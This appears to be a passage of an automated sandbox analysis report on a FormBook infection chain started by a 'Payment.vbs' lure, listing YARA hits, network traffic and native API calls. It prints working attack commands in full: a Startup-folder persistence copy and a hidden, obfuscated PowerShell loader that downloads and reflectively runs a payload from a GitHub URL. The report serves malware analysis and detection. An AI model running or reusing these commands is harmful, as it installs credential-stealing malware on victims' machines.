Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txth3k;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977602776.0000000004074000.00000004.10000000.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.0000000002984000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F5F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Sample has a suspicious name (potential lure to open the executable)

Source: Payment.vbs

Static file information: Suspicious name

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0042C853 NtClose,	10_2_0042C853
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039435C0 NtCreateMutant,LdrInitializeThunk,	10_2_039435C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942B60 NtClose,LdrInitializeThunk,	10_2_03942B60
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03942DF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03942C70
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03944340 NtSetContextThread,	10_2_03944340
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943090 NtSetValueKey,	10_2_03943090
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943010 NtOpenDirectoryObject,	10_2_03943010
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03944650 NtSuspendThread,	10_2_03944650
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942B80 NtQueryInformationFile,	10_2_03942B80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BA0 NtEnumerateValueKey,	10_2_03942BA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BF0 NtAllocateVirtualMemory,	10_2_03942BF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942BE0 NtQueryValueKey,	10_2_03942BE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AB0 NtWaitForSingleObject,	10_2_03942AB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AD0 NtReadFile,	10_2_03942AD0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942AF0 NtWriteFile,	10_2_03942AF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039439B0 NtGetContextThread,	10_2_039439B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F90 NtProtectVirtualMemory,	10_2_03942F90
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FB0 NtResumeThread,	10_2_03942FB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FA0 NtQuerySection,	10_2_03942FA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942FE0 NtCreateFile,	10_2_03942FE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F30 NtCreateSection,	10_2_03942F30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942F60 NtCreateProcessEx,	10_2_03942F60
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942E80 NtReadVirtualMemory,	10_2_03942E80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942EA0 NtAdjustPrivilegesToken,	10_2_03942EA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942EE0 NtQueueApcThread,	10_2_03942EE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942E30 NtWriteVirtualMemory,	10_2_03942E30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DB0 NtEnumerateKey,	10_2_03942DB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942DD0 NtDelayExecution,	10_2_03942DD0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D10 NtMapViewOfSection,	10_2_03942D10
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943D10 NtOpenProcessToken,	10_2_03943D10
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D00 NtSetInformationFile,	10_2_03942D00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942D30 NtUnmapViewOfSection,	10_2_03942D30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03943D70 NtOpenThread,	10_2_03943D70
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CA0 NtQueryInformationToken,	10_2_03942CA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CC0 NtQueryVirtualMemory,	10_2_03942CC0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942CF0 NtOpenProcess,	10_2_03942CF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C00 NtQueryInformationProcess,	10_2_03942C00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03942C60 NtCreateKey,	10_2_03942C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D4340 NtSetContextThread,LdrInitializeThunk,	19_2_036D4340
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D4650 NtSuspendThread,LdrInitializeThunk,	19_2_036D4650
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D35C0 NtCreateMutant,LdrInitializeThunk,	19_2_036D35C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2B60 NtClose,LdrInitializeThunk,	19_2_036D2B60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BE0 NtQueryValueKey,LdrInitializeThunk,	19_2_036D2BE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_036D2BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	19_2_036D2BA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AF0 NtWriteFile,LdrInitializeThunk,	19_2_036D2AF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AD0 NtReadFile,LdrInitializeThunk,	19_2_036D2AD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D39B0 NtGetContextThread,LdrInitializeThunk,	19_2_036D39B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F30 NtCreateSection,LdrInitializeThunk,	19_2_036D2F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FE0 NtCreateFile,LdrInitializeThunk,	19_2_036D2FE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FB0 NtResumeThread,LdrInitializeThunk,	19_2_036D2FB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2EE0 NtQueueApcThread,LdrInitializeThunk,	19_2_036D2EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2E80 NtReadVirtualMemory,LdrInitializeThunk,	19_2_036D2E80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	19_2_036D2D30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D10 NtMapViewOfSection,LdrInitializeThunk,	19_2_036D2D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	19_2_036D2DF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DD0 NtDelayExecution,LdrInitializeThunk,	19_2_036D2DD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C60 NtCreateKey,LdrInitializeThunk,	19_2_036D2C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_036D2C70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CA0 NtQueryInformationToken,LdrInitializeThunk,	19_2_036D2CA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3010 NtOpenDirectoryObject,	19_2_036D3010
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3090 NtSetValueKey,	19_2_036D3090
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2B80 NtQueryInformationFile,	19_2_036D2B80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2AB0 NtWaitForSingleObject,	19_2_036D2AB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F60 NtCreateProcessEx,	19_2_036D2F60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2FA0 NtQuerySection,	19_2_036D2FA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2F90 NtProtectVirtualMemory,	19_2_036D2F90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2E30 NtWriteVirtualMemory,	19_2_036D2E30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2EA0 NtAdjustPrivilegesToken,	19_2_036D2EA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3D70 NtOpenThread,	19_2_036D3D70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2D00 NtSetInformationFile,	19_2_036D2D00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D3D10 NtOpenProcessToken,	19_2_036D3D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2DB0 NtEnumerateKey,	19_2_036D2DB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2C00 NtQueryInformationProcess,	19_2_036D2C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CF0 NtOpenProcess,	19_2_036D2CF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D2CC0 NtQueryVirtualMemory,	19_2_036D2CC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F9F8 NtSetContextThread,	19_2_0356F9F8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F02A NtQueryInformationProcess,NtReadVirtualMemory,	19_2_0356F02A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F038 NtQueryInformationProcess,	19_2_0356F038

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD34632ED6	5_2_00007FFD34632ED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD3463169F	5_2_00007FFD3463169F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346338F2	5_2_00007FFD346338F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34642B0A	6_2_00007FFD34642B0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346250AD	8_2_00007FFD346250AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346228B5	8_2_00007FFD346228B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3462520D	8_2_00007FFD3462520D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34620E05	8_2_00007FFD34620E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34624EFD	8_2_00007FFD34624EFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346217D1	8_2_00007FFD346217D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346F312D	8_2_00007FFD346F312D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00418823	10_2_00418823
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004100C3	10_2_004100C3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004100BA	10_2_004100BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004169FE	10_2_004169FE
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00416A03	10_2_00416A03
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004102E3	10_2_004102E3
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040E363	10_2_0040E363
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00403320	10_2_00403320
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040E53B	10_2_0040E53B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0042EE43	10_2_0042EE43
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402EA8	10_2_00402EA8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402EB0	10_2_00402EB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00402790	10_2_00402790
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0395739A	10_2_0395739A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391E3F0	10_2_0391E3F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D03E6	10_2_039D03E6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C132D	10_2_039C132D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FD34C	10_2_038FD34C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CA352	10_2_039CA352
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039152A0	10_2_039152A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B2C0	10_2_0392B2C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B12ED	10_2_039B12ED
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0274	10_2_039B0274
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391B1B0	10_2_0391B1B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D01AA	10_2_039D01AA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C81CC	10_2_039C81CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AA118	10_2_039AA118
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900100	10_2_03900100
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03998158	10_2_03998158
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DB16B	10_2_039DB16B
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0394516C	10_2_0394516C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038FF172	10_2_038FF172
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039170C0	10_2_039170C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BF0CC	10_2_039BF0CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C70E9	10_2_039C70E9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF0E0	10_2_039CF0E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF7B0	10_2_039CF7B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390C7C0	10_2_0390C7C0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03934750	10_2_03934750
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910770	10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C16CC	10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392C6E0	10_2_0392C6E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039D0591	10_2_039D0591
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039AD5B0	10_2_039AD5B0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910535	10_2_03910535
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7571	10_2_039C7571
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BE4F6	10_2_039BE4F6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CF43F	10_2_039CF43F
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C2446	10_2_039C2446
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03901460	10_2_03901460
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392FB80	10_2_0392FB80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C6BD7	10_2_039C6BD7
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03985BF0	10_2_03985BF0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0394DBF9	10_2_0394DBF9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CAB40	10_2_039CAB40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFB76	10_2_039CFB76
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390EA80	10_2_0390EA80
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03955AA0	10_2_03955AA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039ADAAC	10_2_039ADAAC
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039BDAC6	10_2_039BDAC6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFA49	10_2_039CFA49
